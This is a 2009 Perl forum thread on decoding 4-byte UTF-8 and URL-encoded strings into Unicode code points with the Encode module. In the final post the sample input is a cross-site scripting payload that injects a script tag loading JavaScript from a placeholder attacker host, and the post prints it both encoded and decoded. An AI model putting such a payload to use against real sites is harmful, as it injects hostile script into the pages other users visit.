converting UTF-8 to unicode hex with perl

Discussion in 'Perl Misc' started by FangQ, Jun 27, 2009.

  1. FangQ

    FangQ Guest

    I need to convert a utf-8 encoded character to it's corresponding
    unicode value. Because these characters is located between
    0x20000~0x2FFFF, therefore, my old approach, i.e. using Text::Iconv
    (from UTF-8 to UCS-2) does not work anymore. Any better approach?
    (converting to its surrogate pairs is also fine)

    as an example, the URL encoded UTF-8 character (4 byte) is "%F0%A1%BF
    %AA", and I want the output to be 0x21FEA.

    thanks in advance!
    FangQ, Jun 27, 2009
    #1
    1. Advertising

  2. On 2009-06-27 07:24, FangQ <> wrote:
    > I need to convert a utf-8 encoded character to it's corresponding
    > unicode value.


    Use the "decode" function.

    > Because these characters is located between
    > 0x20000~0x2FFFF, therefore, my old approach, i.e. using Text::Iconv
    > (from UTF-8 to UCS-2) does not work anymore. Any better approach?
    > (converting to its surrogate pairs is also fine)


    my $characters = decode('UTF-8', $bytes);

    for (split(//, $characters)) {
    printf("%#x\n", ord);
    }

    hp
    Peter J. Holzer, Jun 27, 2009
    #2
    1. Advertising

  3. FangQ

    Guest

    On Sat, 27 Jun 2009 00:24:06 -0700 (PDT), FangQ <> wrote:

    >I need to convert a utf-8 encoded character to it's corresponding
    >unicode value. Because these characters is located between
    >0x20000~0x2FFFF, therefore, my old approach, i.e. using Text::Iconv
    >(from UTF-8 to UCS-2) does not work anymore. Any better approach?
    >(converting to its surrogate pairs is also fine)
    >
    >as an example, the URL encoded UTF-8 character (4 byte) is "%F0%A1%BF
    >%AA", and I want the output to be 0x21FEA.
    >
    >thanks in advance!


    Something like below should help.

    -sln

    ------------------------
    use strict;
    use warnings;
    use Encode;
    binmode STDOUT, ':utf8';

    print "\n";

    my $tmp = "\x{21fea}";

    my $octets = encode ("utf8", $tmp);
    print "Encoded string:\n";
    print " length = ".length($octets)."\n";
    print " octets = $octets\n";
    print " URL val = ";
    for (split //, $octets) {
    printf ("%%%X", ord($_));
    }
    print "\n\n";

    my $string = decode ("utf8", $octets);
    print "Decoded string:\n";
    print " length = ".length($string)."\n";
    print " string = $string\n";
    print " HEX val = ";
    for (split //, $string) {
    printf ("0x%X", ord($_));
    }
    print "\n";

    __END__

    Output:

    Encoded string:
    length = 4
    octets = +¦-í-+-¬
    URL val = %F0%A1%BF%AA

    Decoded string:
    length = 1
    string = =í+¬
    HEX val = 0x21FEA
    , Jun 27, 2009
    #3
  4. FangQ

    FangQ Guest

    thank you both for the quick response. I followed your examples and
    get the conversion working.


    Qianqian


    On Jun 27, 5:37 am, "Peter J. Holzer" <> wrote:
    > On 2009-06-27 07:24, FangQ <> wrote:
    >
    > > I need to convert a utf-8 encoded character to it's corresponding
    > > unicode value.

    >
    > Use the "decode" function.
    >
    > > Because these characters is located between
    > > 0x20000~0x2FFFF, therefore, my old approach, i.e. using Text::Iconv
    > > (from UTF-8 to UCS-2) does not work anymore. Any better approach?
    > > (converting to its surrogate pairs is also fine)

    >
    > my $characters = decode('UTF-8', $bytes);
    >
    > for (split(//, $characters)) {
    >     printf("%#x\n", ord);
    >
    > }
    >
    >         hp
    FangQ, Jun 27, 2009
    #4
  5. FangQ

    Guest

    On Sat, 27 Jun 2009 06:49:55 -0700 (PDT), FangQ <> wrote:

    >thank you both for the quick response. I followed your examples and
    >get the conversion working.
    >
    >
    >Qianqian
    >
    >


    One last question. If you can't decode the URL with that module
    (because of 4-byte embeded utf8), what are you using?

    -sln
    -----------------------------------
    use strict;
    use warnings;
    use Encode;
    binmode STDOUT, ':utf8';

    my $urlchrs = qr/[^\w.!~*'()]/; #URL unreserved chars (just a guess)

    my $url_encoded_sample = 'http://target/getdata.php?data=%3cscript%20src=%22http%3a%2f%2f
    www.badplace.com/nasty𡿪.js"></script>';
    # 4byte, UTF-8 ^^^^^^^^^^^^

    # test prints of URL encoded sample ...
    print "\nSample:\n$url_encoded_sample\n",'-'x20,"\n";
    print "\n", decodeURL( $url_encoded_sample ),"\n";
    print "\n", encodeURL( decodeURL( $url_encoded_sample ) ),"\n";
    print "\n", decodeURL( encodeURL( decodeURL( $url_encoded_sample ) ) ),"\n\n";

    # decoded UTF-8. values > 255 are shown as dynamic generated hex string (useless) ...
    for (split //, decode ('UTF-8', decodeURL( $url_encoded_sample ) )) {
    my $uchar = ord;
    if ($uchar >= 255) {
    printf ("\\x{%X}", $uchar);
    } else {
    print;
    }
    }
    print "\n";
    exit 0;

    # subs ...
    sub decodeURL {
    my $bytes = shift;
    $bytes =~ s/%([0-9a-fA-F]{2})/ pack ("C", hex($1)) /ge; # octets 'C'
    return $bytes;
    }
    sub encodeURL {
    my $text = shift;
    $text =~ s/($urlchrs)/ sprintf ("%%%02X", ord($1)) /ge;
    return $text;
    }

    __END__

    Output:

    Sample:
    http://target/getdata.php?data=<script src="http://
    www.badplace.com/nasty𡿪.js"></script>
    --------------------

    http://target/getdata.php?data=<script src="http://
    www.badplace.com/nasty+¦-í-+-¬.js"></script>

    http%3A%2F%2Ftarget%2Fgetdata.php%3Fdata%3D%3Cscript%20src%3D%22http%3A%2F%2F%0A
    www.badplace.com/nasty𡿪.js"></script>

    http://target/getdata.php?data=<script src="http://
    www.badplace.com/nasty+¦-í-+-¬.js"></script>

    http://target/getdata.php?data=<script src="http://
    www.badplace.com/nasty\x{21FEA}.js"></script>
    , Jun 28, 2009
    #5
    1. Advertising

Want to reply to this thread or ask your own question?

It takes just 2 minutes to sign up (and it's free!). Just click the sign up button to choose a username and then you can ask your own questions on the forum.
Similar Threads
  1. Replies:
    10
    Views:
    6,191
    Neredbojias
    Aug 19, 2005
  2. Bengt Richter
    Replies:
    6
    Views:
    466
    Juha Autero
    Aug 19, 2003
  3. Jimmy Shaw

    Converting from UTF-16 to UTF-32

    Jimmy Shaw, Jul 31, 2006, in forum: C++
    Replies:
    7
    Views:
    1,320
    P.J. Plauger
    Aug 1, 2006
  4. moonhkt
    Replies:
    18
    Views:
    2,517
    Roedy Green
    Feb 5, 2010
  5. Grzegorz ¦liwiñski
    Replies:
    2
    Views:
    959
    Grzegorz ¦liwiñski
    Jan 19, 2011
Loading...

Share This Page